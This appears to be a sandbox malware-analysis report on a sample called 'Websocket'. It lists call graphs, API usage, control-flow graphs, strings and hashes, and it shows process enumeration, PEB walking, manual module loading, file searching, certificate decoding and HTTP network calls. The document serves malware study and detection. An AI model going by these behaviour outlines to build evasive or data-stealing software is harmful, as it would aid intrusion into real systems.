6153bb GetNativeSystemInfo 24139->24141 24140 613e40 GetPEB 24140->24141 24141->24138 24141->24139 24141->24140 24142 613da0 GetPEB 24141->24142 24142->24141 24599 6146e0 GetPEB CreateToolhelp32Snapshot Process32FirstW FindCloseChangeNotification 24514 619bf0 24523 619c00 24514->24523 24515 619cde 24516 619d02 CreateThread 24515->24516 24525 613e40 GetPEB 24515->24525 24517 619c95 24516->24517 24527 619860 24516->24527 24519 619cf1 24526 613da0 GetPEB 24519->24526 24521 619cfd 24521->24516 24522 613da0 GetPEB 24522->24523 24523->24515 24523->24517 24523->24522 24524 613e40 GetPEB 24523->24524 24524->24523 24525->24519 24526->24521 24537 619880 24527->24537 24528 619a54 24529 619a47 24528->24529 24551 613e40 GetPEB 24528->24551 24531 613e40 GetPEB 24531->24537 24532 619a67 24552 613da0 GetPEB 24532->24552 24533 619a90 4 API calls 24533->24537 24534 6198d2 FindFirstChangeNotificationW 24539 619a90 24534->24539 24537->24528 24537->24529 24537->24531 24537->24533 24537->24534 24538 613da0 GetPEB 24537->24538 24538->24537 24549 619aa0 24539->24549 24540 619aca 24540->24537 24541 619b9d 24544 619bc1 lstrcmpiW 24541->24544 24553 613e40 GetPEB 24541->24553 24542 613e40 GetPEB 24542->24549 24543 619b2e GetCurrentProcess QueryFullProcessImageNameW 24543->24549 24544->24537 24546 619bb0 24554 613da0 GetPEB 24546->24554 24547 613da0 GetPEB 24547->24549 24549->24540 24549->24541 24549->24542 24549->24543 24549->24547 24550 619bbc 24550->24544 24551->24532 24552->24529 24553->24546 24554->24550 24649 61adf0 GetPEB GetVolumeInformationW _snprintf 24650 7321ea 7 API calls 24604 411ee0 6 API calls 2 library calls 24605 4122ed IsProcessorFeaturePresent 24608 412cee 69 API calls FindHandler 24655 40edf0 66 API calls std::exception::exception 24491 6180d0 24496 6181a1 24491->24496 24492 6181fb CreateFileW 24493 6182f5 24492->24493 24492->24496 24494 613e40 GetPEB 24494->24496 24495 613da0 GetPEB 24495->24496 24496->24492 24496->24493 24496->24494 24496->24495 24612 6020de GetPEB 24095 40ea80 24100 41025b 24095->24100 24098 41025b std::exception::_Copy_str 66 API calls 24099 40ea9b 24098->24099 24101 4102d8 24100->24101 24105 410269 24100->24105 24123 412a79 DecodePointer 24101->24123 24103 4102de 24124 411e2c 66 API calls __getptd_noexit 24103->24124 24104 410274 24104->24105 24117 412a13 66 API calls 2 library calls 24104->24117 24118 412864 66 API calls 8 library calls 24104->24118 24119 41257e GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 24104->24119 24105->24104 24108 410297 RtlAllocateHeap 24105->24108 24111 4102c4 24105->24111 24115 4102c2 24105->24115 24120 412a79 DecodePointer 24105->24120 24108->24105 24109 40ea93 24108->24109 24109->24098 24121 411e2c 66 API calls __getptd_noexit 24111->24121 24122 411e2c 66 API calls __getptd_noexit 24115->24122 24117->24104 24118->24104 24120->24105 24121->24115 24122->24109 24123->24103 24124->24109 24613 410881 67 API calls __calloc_crt 24143 6112a0 24167 6112d1 24143->24167 24144 611817 24158 611836 24144->24158 24232 613e40 GetPEB 24144->24232 24146 614120 GetPEB 24146->24167 24147 61182a 24233 613da0 GetPEB 24147->24233 24151 613da0 GetPEB 24151->24167 24153 6117d7 24154 613480 GetPEB 24154->24167 24158->24153 24234 613e40 GetPEB 24158->24234 24159 613e40 GetPEB 24159->24167 24162 611852 24235 613da0 GetPEB 24162->24235 24167->24144 24167->24146 24167->24151 24167->24153 24167->24154 24167->24159 24168 613420 GetPEB 24167->24168 24169 611801 24167->24169 24172 612b60 24167->24172 24191 615b40 24167->24191 24213 612210 GetPEB RtlAllocateHeap 24167->24213 24214 614060 GetPEB 24167->24214 24215 611e50 GetPEB 24167->24215 24216 611940 GetPEB 24167->24216 24217 614db0 GetPEB 24167->24217 24218 611fa0 GetPEB RtlAllocateHeap 24167->24218 24219 6141c0 24167->24219 24230 611c70 GetPEB 24167->24230 24168->24167 24231 614120 GetPEB 24169->24231 24171 611808 24190 612b98 24172->24190 24173 612f94 24177 612fb3 24173->24177 24249 613e40 GetPEB 24173->24249 24174 612e0d InternetOpenW 24174->24190 24176 612d2b HttpSendRequestW 24176->24190 24177->24167 24178 612ec8 InternetCloseHandle 24178->24190 24180 6141c0 2 API calls 24180->24190 24181 612c9e InternetConnectW 24181->24190 24183 612fa7 24250 613da0 GetPEB 24183->24250 24184 613e40 GetPEB 24184->24190 24186 612daf ObtainUserAgentString 24186->24190 24187 613da0 GetPEB 24187->24190 24190->24173 24190->24174 24190->24176 24190->24177 24190->24178 24190->24180 24190->24181 24190->24184 24190->24186 24190->24187 24236 612900 GetPEB 24190->24236 24237 615620 GetPEB 24190->24237 24238 614120 GetPEB 24190->24238 24239 613480 24190->24239 24192 615b50 24191->24192 24193 615b66 24191->24193 24255 613e40 GetPEB 24192->24255 24196 615b93 RtlAllocateHeap 24193->24196 24257 613e40 GetPEB 24193->24257 24195 615b5a 24256 613da0 GetPEB 24195->24256 24199 615c12 24196->24199 24203 615ba3 24196->24203 24199->24167 24200 615b82 24258 613da0 GetPEB 24200->24258 24202 615b8e 24202->24196 24208 615bd9 24203->24208 24259 613e40 GetPEB 24203->24259 24205 615bcd 24260 613da0 GetPEB 24205->24260 24207 615c06 RtlFreeHeap 24207->24167 24208->24207 24261 613e40 GetPEB 24208->24261 24210 615bf5 24262 613da0 GetPEB 24210->24262 24212 615c01 24212->24207 24213->24167 24214->24167 24215->24167 24216->24167 24217->24167 24218->24167 24220 6141e3 24219->24220 24221 6141cd 24219->24221 24225 614210 RtlAllocateHeap 24220->24225 24265 613e40 GetPEB 24220->24265 24263 613e40 GetPEB 24221->24263 24223 6141d7 24264 613da0 GetPEB 24223->24264 24225->24167 24227 6141ff 24266 613da0 GetPEB 24227->24266 24229 61420b 24229->24225 24230->24167 24231->24171 24232->24147 24233->24158 24234->24162 24235->24153 24236->24190 24237->24190 24238->24190 24240 6134a3 24239->24240 24241 6134c8 24240->24241 24251 613e40 GetPEB 24240->24251 24248 6134f0 24241->24248 24253 613e40 GetPEB 24241->24253 24243 6134bc 24252 613da0 GetPEB 24243->24252 24246 6134e4 24254 613da0 GetPEB 24246->24254 24248->24190 24249->24183 24250->24177 24251->24243 24252->24241 24253->24246 24254->24248 24255->24195 24256->24193 24257->24200 24258->24202 24259->24205 24260->24208 24261->24210 24262->24212 24263->24223 24264->24220 24265->24227 24266->24229 24616 7326b0 wcslen wcslen wcslen 24660 413787 TlsAlloc 24380 614ba8 24393 614bb0 24380->24393 24381 614c5a Process32FirstW 24381->24393 24382 614cc8 24385 614cec FindCloseChangeNotification 24382->24385 24394 613e40 GetPEB 24382->24394 24383 614cb4 24384 613e40 GetPEB 24384->24393 24387 614cef 24385->24387 24388 614cdb 24395 613da0 GetPEB 24388->24395 24389 614bfe CreateToolhelp32Snapshot 24389->24387 24389->24393 24390 613da0 GetPEB 24390->24393 24392 614ce7 24392->24385 24393->24381 24393->24382 24393->24383 24393->24384 24393->24389 24393->24390 24394->24388 24395->24392 24617 6160a2 GetPEB RtlAllocateHeap CreateToolhelp32Snapshot Process32FirstW FindCloseChangeNotification 24663 410d8f 107 API calls 3 library calls 24619 7314a0 9 API calls 24620 40f5e0 137 API calls 2 library calls 24666 611fb2 GetPEB RtlAllocateHeap 24621 410a9b 5 API calls ___security_init_cookie 24267 611880 24268 6118a2 24267->24268 24269 61188c 24267->24269 24277 6118cb 24268->24277 24294 613e40 GetPEB 24268->24294 24292 613e40 GetPEB 24269->24292 24271 611896 24293 613da0 GetPEB 24271->24293 24274 6118bf 24295 613da0 GetPEB 24274->24295 24275 61192d 24277->24275 24282 6125a0 24277->24282 24279 611917 24280 61191b 24279->24280 24296 614120 GetPEB 24279->24296 24291 6125b0 24282->24291 24283 612812 CryptDecodeObjectEx 24283->24291 24284 6141c0 2 API calls 24284->24291 24285 6128de 24297 614120 GetPEB 24285->24297 24286 613e40 GetPEB 24286->24291 24288 6128e9 24288->24279 24289 613da0 GetPEB 24289->24291 24290 6125ec 24290->24279 24291->24283 24291->24284 24291->24285 24291->24286 24291->24289 24291->24290 24292->24271 24293->24268 24294->24274 24295->24277 24296->24275 24297->24288 24346 619180 24352 6191a0 24346->24352 24348 6191cd 24350 619255 24350->24348 24350->24352 24373 614b90 GetPEB CreateToolhelp32Snapshot Process32FirstW FindCloseChangeNotification 24350->24373 24352->24348 24352->24350 24354 6145c0 24352->24354 24371 613e40 GetPEB 24352->24371 24372 613da0 GetPEB 24352->24372 24355 6145d7 24354->24355 24361 6145ed 24354->24361 24374 613e40 GetPEB 24355->24374 24357 6145e1 24375 613da0 GetPEB 24357->24375 24359 614660 24359->24352 24360 614626 QueryFullProcessImageNameW 24362 614652 24360->24362 24363 61463c 24360->24363 24361->24359 24361->24360 24376 613e40 GetPEB 24361->24376 24362->24352 24378 613e40 GetPEB 24363->24378 24366 614615 24377 613da0 GetPEB 24366->24377 24367 614646 24379 613da0 GetPEB 24367->24379 24370 614621 24370->24360 24371->24352 24372->24352 24373->24350 24374->24357 24375->24361 24376->24366 24377->24370 24378->24367 24379->24362 24622 731890 FreeLibrary 24671 40f3b0 RaiseException __CxxThrowException@8 24672 40f7b0 162 API calls __except_handler4

                                    Executed Functions

                                    Function 0040FA80 Relevance: 63.2, APIs: 23, Strings: 13, Instructions: 250windowregistrythreadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • _memset.LIBCMT ref: 0040FA8E
                                    • LoadIconW.USER32 ref: 0040FAD2
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040FADF
                                    • LoadIconW.USER32 ref: 0040FB0B
                                    • CreateThread.KERNELBASE(00000000,00000000,Function_0000ECC0,00000000,00000002,?), ref: 0040FB23
                                    • RegisterClassExW.USER32(?), ref: 0040FB42
                                    • MessageBoxW.USER32(00000000,Call to RegisterClassEx failed!,Create Process,00000000), ref: 0040FB5B
                                    • CreateWindowExW.USER32(00000000,win32app,Windows Process Manager,00CF0000,80000000,80000000,000001B8,00000258,00000000,00000000,?,00000000), ref: 0040FBA4
                                    • MessageBoxW.USER32(00000000,Call to CreateWindow failed!,Win32 Guided Tour,00000000), ref: 0040FBBC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: Load$CreateIconMessage$ClassCursorRegisterThreadWindow_memset
                                    • String ID: 0$BUTTON$Call to CreateWindow failed!$Call to RegisterClassEx failed!$Cancel$Create Process$Edit$Kill Process$Run$View All Processes$Win32 Guided Tour$Windows Process Manager$win32app
                                    • API String ID: 713769167-1192827546
                                    • Opcode ID: 952da5468408a189c14926ca3cf5cae3a85ce14d76ca3222c90a6cd4c0bb2d80
                                    • Instruction ID: d065e50bf912697da28d798f56a1b3ea1efd5d731bf56130ae663ba60a7ce2a6
                                    • Opcode Fuzzy Hash: 952da5468408a189c14926ca3cf5cae3a85ce14d76ca3222c90a6cd4c0bb2d80
                                    • Instruction Fuzzy Hash: 9A8120B1BD4300BAF220DB50DC56FDA37A8AB98F05F10842AF7017A2D0D7F969458B5E
                                    Function 00731030 Relevance: 18.4, APIs: 12, Instructions: 362libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 22 731030-731075 LoadLibraryW GetProcAddress call 731b30 25 731077-731079 22->25 26 73107e-73108f 22->26 27 73148d-731490 25->27 28 7310a3-7310be call 731b30 26->28 29 731091-73109e SetLastError 26->29 32 7310c0-7310c2 28->32 33 7310c7-7310dc 28->33 29->27 32->27 34 7310f0-7310fd 33->34 35 7310de-7310eb SetLastError 33->35 36 731111-73111a 34->36 37 7310ff-73110c SetLastError 34->37 35->27 38 73112e-73114f 36->38 39 73111c-731129 SetLastError 36->39 37->27 40 731163-73116d 38->40 39->27 41 7311a5-7311d5 GetNativeSystemInfo call 7318d0 * 2 40->41 42 73116f-731176 40->42 53 7311d7-7311e4 SetLastError 41->53 54 7311e9-73120c call 731800 41->54 43 731186-731192 42->43 44 731178-731184 42->44 46 731195-73119b 43->46 44->46 48 7311a3 46->48 49 73119d-7311a0 46->49 48->40 49->48 53->27 56 73120e-73121f call 731800 54->56 57 73123d-731255 GetProcessHeap RtlAllocateHeap 54->57 60 731222-73122c 56->60 58 731257-731276 SetLastError 57->58 59 73127b-731291 57->59 58->27 61 731293-73129a 59->61 62 73129c 59->62 60->57 64 73122e-731238 SetLastError 60->64 63 7312a3-731300 call 731b30 61->63 62->63 68 731302 63->68 69 731307-731370 call 731800 call 731980 call 731b50 63->69 64->27 70 73147f-73148b call 7316c0 68->70 78 731372 69->78 79 731377-731388 69->79 70->27 78->70 80 7313a2-7313a5 79->80 81 73138a-7313a0 call 732090 79->81 82 7313ac-7313ba call 7321a0 80->82 81->82 87 7313c1-7313c5 call 731e80 82->87 88 7313bc 82->88 90 7313ca-7313cf 87->90 88->70 91 7313d1 90->91 92 7313d6-7313e4 call 732010 90->92 91->70 95 7313e6 92->95 96 7313eb-7313f4 92->96 95->70 97 731470-731473 96->97 98 7313f6-7313fd 96->98 99 73147a-73147d 97->99 100 7313ff-73145b GetPEB 98->100 101 73145d-73146b 98->101 99->27 102 73146e 100->102 101->102 102->99
                                    APIs
                                    • LoadLibraryW.KERNEL32(00734054,00734040), ref: 00731047
                                    • GetProcAddress.KERNEL32(00000000), ref: 0073104E
                                      • Part of subcall function 00731B30: SetLastError.KERNEL32(0000000D,?,00731070,?,00000040), ref: 00731B3D
                                    • SetLastError.KERNEL32(000000C1), ref: 00731096
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637741644.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_731000_Websocket.jbxd
                                    Similarity
                                    • API ID: ErrorLast$AddressLibraryLoadProc
                                    • String ID:
                                    • API String ID: 1866314245-0
                                    • Opcode ID: 9509a99d816b47babac5a904169f67d270672e3d59b76580bac1085bbdbd1315
                                    • Instruction ID: e615c680cb785a787bd2e93cf47587405d15fa82212a8800eb6a9e786ccb4839
                                    • Opcode Fuzzy Hash: 9509a99d816b47babac5a904169f67d270672e3d59b76580bac1085bbdbd1315
                                    • Instruction Fuzzy Hash: 96F1FCB5E00209EFEB04CF94D984AAEB7B1BF48305F608558E915AB352D739EE41DB90
                                    Function 006180D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 169fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 243 6180d0-61819c 244 6181a1-6181a7 243->244 245 6181ad 244->245 246 61826e-618274 244->246 249 6181b3-6181b9 245->249 250 618264-618269 245->250 247 618300-618307 246->247 248 61827a-618280 246->248 253 618324-618337 247->253 254 618309-61831f call 613e40 call 613da0 247->254 251 618282-618289 248->251 252 6182e9-6182ef 248->252 255 61833c-618384 call 61b400 249->255 256 6181bf-6181c5 249->256 250->244 260 6182a6-6182c9 251->260 261 61828b-6182a1 call 613e40 call 613da0 251->261 252->244 262 6182f5-6182ff 252->262 253->244 254->253 255->262 273 61838a 255->273 257 6181c7-6181cd 256->257 258 61822f-618236 256->258 257->252 264 6181d3-6181db 257->264 267 618253-61825f 258->267 268 618238-61824e call 613e40 call 613da0 258->268 286 6182e6 260->286 287 6182cb-6182e1 call 613e40 call 613da0 260->287 261->260 271 6181fb-61821f CreateFileW 264->271 272 6181dd-6181f5 call 613e40 call 613da0 264->272 267->244 268->267 271->262 282 618225-61822a 271->282 272->271 280 618394-6183a1 273->280 281 61838c-61838e 273->281 281->262 281->280 282->244 286->252 287->286
                                    APIs
                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,0100754F,00000000), ref: 00618218
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID: @1v$DR$Ou$m$.v
                                    • API String ID: 823142352-4143615534
                                    • Opcode ID: 8daf6be44b3de00673a1987c71c6c6435f5574d234eaf9a35b7b999e5a918531
                                    • Instruction ID: f1b74c4d0477e5305279413d6bd04c304a3b4ce1f699152a9111f1636913406b
                                    • Opcode Fuzzy Hash: 8daf6be44b3de00673a1987c71c6c6435f5574d234eaf9a35b7b999e5a918531
                                    • Instruction Fuzzy Hash: 3B61A132A087019FD754DF68C845AAFB6E2ABD4714F08890DF495D7390DB78CA498BC2
                                    Function 006138B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 298 6138b0-6138cb 299 6138d0-6138d5 298->299 300 613a85-613a8a 299->300 301 6138db 299->301 302 613af1-613af8 300->302 303 613a8c-613a91 300->303 304 6138e1-6138e6 301->304 305 613a7b-613a80 301->305 308 613b15-613b2b FindNextFileW 302->308 309 613afa-613b10 call 613e40 call 613da0 302->309 310 613a93-613a9a 303->310 311 613adb-613ae0 303->311 306 613b30-613b37 304->306 307 6138ec-6138f1 304->307 305->299 318 613b54-613b55 FindClose 306->318 319 613b39-613b4f call 613e40 call 613da0 306->319 312 6139d7-6139ea call 613480 307->312 313 6138f7-6138fc 307->313 308->299 309->308 316 613ab7-613acb FindFirstFileW 310->316 317 613a9c-613ab2 call 613e40 call 613da0 310->317 311->299 314 613ae6-613af0 311->314 337 613a07-613a22 312->337 338 6139ec-613a02 call 613e40 call 613da0 312->338 313->311 322 613902-613907 313->322 320 613ad1-613ad6 316->320 321 613b57-613b61 316->321 317->316 318->321 319->318 320->299 327 6139b1-6139d2 322->327 328 61390d-613913 322->328 327->299 333 613915-61391d 328->333 334 613934-613936 328->334 340 61392d-613932 333->340 341 61391f-613923 333->341 334->340 342 613938-61394b call 613480 334->342 352 613a24-613a3a call 613e40 call 613da0 337->352 353 613a3f-613a4a 337->353 338->337 340->299 341->334 349 613925-61392b 341->349 357 613968-613998 call 6138b0 342->357 358 61394d-613963 call 613e40 call 613da0 342->358 349->334 349->340 352->353 364 613a67-613a76 353->364 365 613a4c-613a62 call 613e40 call 613da0 353->365 373 61399d-6139ac call 613420 357->373 358->357 364->299 365->364 373->299
                                    APIs
                                    • FindFirstFileW.KERNELBASE(?,?,?,33A6B453,00000001,00000000), ref: 00613AC4
                                    • FindNextFileW.KERNELBASE(?,?,?,33A6B453,00000001,00000000), ref: 00613B1B
                                    • FindClose.KERNELBASE(?), ref: 00613B55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID: *LO$.
                                    • API String ID: 3541575487-2132576683
                                    • Opcode ID: 70f6ffdf43d36449ec67b17cac167a64cc42f66f9d15a8deded4e52a07b2c987
                                    • Instruction ID: 3e33dc603540513c9bc46e374b0bf59f2070cbbc6b840566a7ad50261fb7d1b6
                                    • Opcode Fuzzy Hash: 70f6ffdf43d36449ec67b17cac167a64cc42f66f9d15a8deded4e52a07b2c987
                                    • Instruction Fuzzy Hash: A75106B1B0426047CB64AB749841AFB76A79F94740F0C881FF447C7391EA75CF868752
                                    Function 006125A0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 228encryptionCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 421 6125a0-6125ac 422 6125b0-6125b6 421->422 423 6127a4-6127aa 422->423 424 6125bc 422->424 425 6127b0 423->425 426 612899-61289f 423->426 427 6125c2-6125c8 424->427 428 612766-61276e 424->428 429 6127b6-6127bc 425->429 430 612848-61284f 425->430 435 6128a5-6128ac 426->435 436 6125e4-6125ea 426->436 431 6126c4-6126ca 427->431 432 6125ce 427->432 433 612770-612788 call 613e40 call 613da0 428->433 434 61278e-61279f 428->434 439 6127ee-6127f5 429->439 440 6127be-6127c4 429->440 437 612851-612867 call 613e40 call 613da0 430->437 438 61286c-61287d 430->438 441 61272a-612732 431->441 442 6126cc-6126d2 431->442 443 6125d0-6125d6 432->443 444 612646-61264d 432->444 433->434 434->422 447 6128c9-6128d9 435->447 448 6128ae-6128c4 call 613e40 call 613da0 435->448 436->422 445 6125ec-6125f3 436->445 437->438 474 612882-612894 438->474 453 612812-612843 CryptDecodeObjectEx 439->453 454 6127f7-61280d call 613e40 call 613da0 439->454 440->436 449 6127ca-6127de call 6141c0 440->449 455 612752-612761 441->455 456 612734-61274c call 613e40 call 613da0 441->456 442->436 450 6126d8-6126e0 442->450 451 6125f4-6125fb 443->451 452 6125d8-6125de 443->452 458 61266a-612680 444->458 459 61264f-612665 call 613e40 call 613da0 444->459 447->422 448->447 449->445 490 6127e4-6127e9 449->490 465 612700-612713 450->465 466 6126e2-6126fa call 613e40 call 613da0 450->466 468 612618-61262c 451->468 469 6125fd-612613 call 613e40 call 613da0 451->469 452->436 467 6128de-6128f0 call 614120 452->467 453->422 454->453 455->422 456->455 486 612685-61269c 458->486 459->458 493 612718-61271a 465->493 466->465 495 61262f-612641 468->495 469->468 474->422 499 6126b9-6126bf 486->499 500 61269e-6126b4 call 613e40 call 613da0 486->500 490->422 504 6128f1-6128fb 493->504 505 612720-612725 493->505 495->422 499->436 500->499 505->422
                                    APIs
                                    • CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?,?), ref: 0061282F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CryptDecodeObject
                                    • String ID: =t$=t
                                    • API String ID: 1207547050-3586649727
                                    • Opcode ID: bd75d7b808dc285b133c541a8bdda49259c67dd08f7f0eb9d1f215ba852772d5
                                    • Instruction ID: d45530a260f897e640b3db61fa746f7c4ff335afc8fa19c11a46701aa3468505
                                    • Opcode Fuzzy Hash: bd75d7b808dc285b133c541a8bdda49259c67dd08f7f0eb9d1f215ba852772d5
                                    • Instruction Fuzzy Hash: 57710D71B002225BDB54AB68DCA6BEA76536B94700F0D802EFD46DF3A0EA21DCD187C5
                                    Function 006152E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 727 6152e0-6152ee 728 6152f0-6152f5 727->728 729 615382-615387 728->729 730 6152fb 728->730 731 6153e1-6153f0 729->731 732 615389-61538e 729->732 733 615378-61537d 730->733 734 6152fd-615302 730->734 731->728 735 615390-615395 732->735 736 6153f5-615403 732->736 733->728 737 615304-615309 734->737 738 61535e-615373 734->738 739 615397-61539e 735->739 740 6153cc-6153d1 735->740 741 615350-61535c 737->741 742 61530b-615310 737->742 738->728 743 6153a0-6153b6 call 613e40 call 613da0 739->743 744 6153bb-6153c7 GetNativeSystemInfo 739->744 740->728 746 6153d7-6153e0 740->746 741->728 742->740 745 615316-615325 742->745 743->744 744->728 748 615342-61534e 745->748 749 615327-61533d call 613e40 call 613da0 745->749 748->728 749->748
                                    APIs
                                    • GetNativeSystemInfo.KERNELBASE(33A6B453,33A6B453), ref: 006153C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoNativeSystem
                                    • String ID: 5sF$5sF
                                    • API String ID: 1721193555-3318035110
                                    • Opcode ID: 3c361d5d48ee2b70d86ceb0d3beb8b1871d67246965052e6b8acf70f91ded45d
                                    • Instruction ID: cfd969a01ca7cd37c02b4fbe947eb5db7af8f71d02253723da4e2be1f0590a97
                                    • Opcode Fuzzy Hash: 3c361d5d48ee2b70d86ceb0d3beb8b1871d67246965052e6b8acf70f91ded45d
                                    • Instruction Fuzzy Hash: 8821D472A00650CBCB68866899816EEF6D39BC4384F5C552BF567CB360F678CEC15387
                                    Function 00612B60 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 311networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 107 612b60-612b94 108 612b98-612b9c 107->108 109 612ba0-612ba6 108->109 110 612d4d-612d53 109->110 111 612bac 109->111 112 612e94-612e9a 110->112 113 612d59 110->113 114 612bb2-612bb8 111->114 115 612cf7-612cf9 111->115 118 612ed5-612ed7 112->118 119 612e9c-612ea2 112->119 120 612de9-612df0 113->120 121 612d5f-612d65 113->121 122 612c66-612c6c 114->122 123 612bbe 114->123 116 612d03-612d05 115->116 117 612cfb-612d01 115->117 126 612d07-612d0e 116->126 117->126 124 612ed9-612ee9 call 613480 118->124 125 612eeb 118->125 129 612e83-612e89 119->129 130 612ea4-612eab 119->130 135 612df2-612e08 call 613e40 call 613da0 120->135 136 612e0d-612e35 InternetOpenW 120->136 131 612d67-612d6d 121->131 132 612ddf-612de4 121->132 127 612cd0-612ce9 call 612900 122->127 128 612c6e-612c74 122->128 133 612f94-612f9b 123->133 134 612bc4-612bca 123->134 141 612eef-612ef6 124->141 125->141 139 612d10-612d26 call 613e40 call 613da0 126->139 140 612d2b-612d48 HttpSendRequestW 126->140 180 612ced-612cf2 127->180 128->129 145 612c7a-612c81 128->145 146 612e8f 129->146 147 612fbe-612fc9 129->147 148 612ec8-612ed0 InternetCloseHandle 130->148 149 612ead-612ec3 call 613e40 call 613da0 130->149 131->129 144 612d73-612d89 call 6141c0 131->144 132->109 153 612fb8 133->153 154 612f9d-612fb3 call 613e40 call 613da0 133->154 151 612c06-612c15 134->151 152 612bcc-612bd2 134->152 135->136 142 612e52-612e5d 136->142 143 612e37-612e4d call 613e40 call 613da0 136->143 139->140 140->108 158 612f13-612f31 141->158 159 612ef8-612f0e call 613e40 call 613da0 141->159 191 612e7a-612e80 142->191 192 612e5f-612e75 call 613e40 call 613da0 142->192 143->142 194 612dd5-612dda 144->194 195 612d8b-612d92 144->195 164 612c83-612c99 call 613e40 call 613da0 145->164 165 612c9e-612ccb InternetConnectW 145->165 146->108 148->109 149->148 161 612c32-612c48 151->161 162 612c17-612c2d call 613e40 call 613da0 151->162 152->129 168 612bd8-612bdf 152->168 153->147 154->153 205 612f33-612f49 call 613e40 call 613da0 158->205 206 612f4e-612f59 158->206 159->158 161->180 208 612c4e-612c56 161->208 162->161 164->165 165->109 181 612be1-612bf7 call 613e40 call 613da0 168->181 182 612bfc-612c04 168->182 180->109 181->182 182->109 191->129 192->191 194->109 209 612d94-612daa call 613e40 call 613da0 195->209 210 612daf-612dbb ObtainUserAgentString 195->210 205->206 233 612f76-612f8f 206->233 234 612f5b-612f71 call 613e40 call 613da0 206->234 208->180 218 612c5c-612c61 208->218 209->210 220 612dbd-612dca call 615620 210->220 221 612dce-612dd0 call 614120 210->221 218->109 220->221 221->194 233->109 234->233
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00612CB4
                                    • HttpSendRequestW.WININET(00000000,?,000000FF,00000000,00000000), ref: 00612D34
                                    • ObtainUserAgentString.URLMON(00000000,00000000,00000200), ref: 00612DB7
                                    • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00612E19
                                    • InternetCloseHandle.WININET(?), ref: 00612EC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
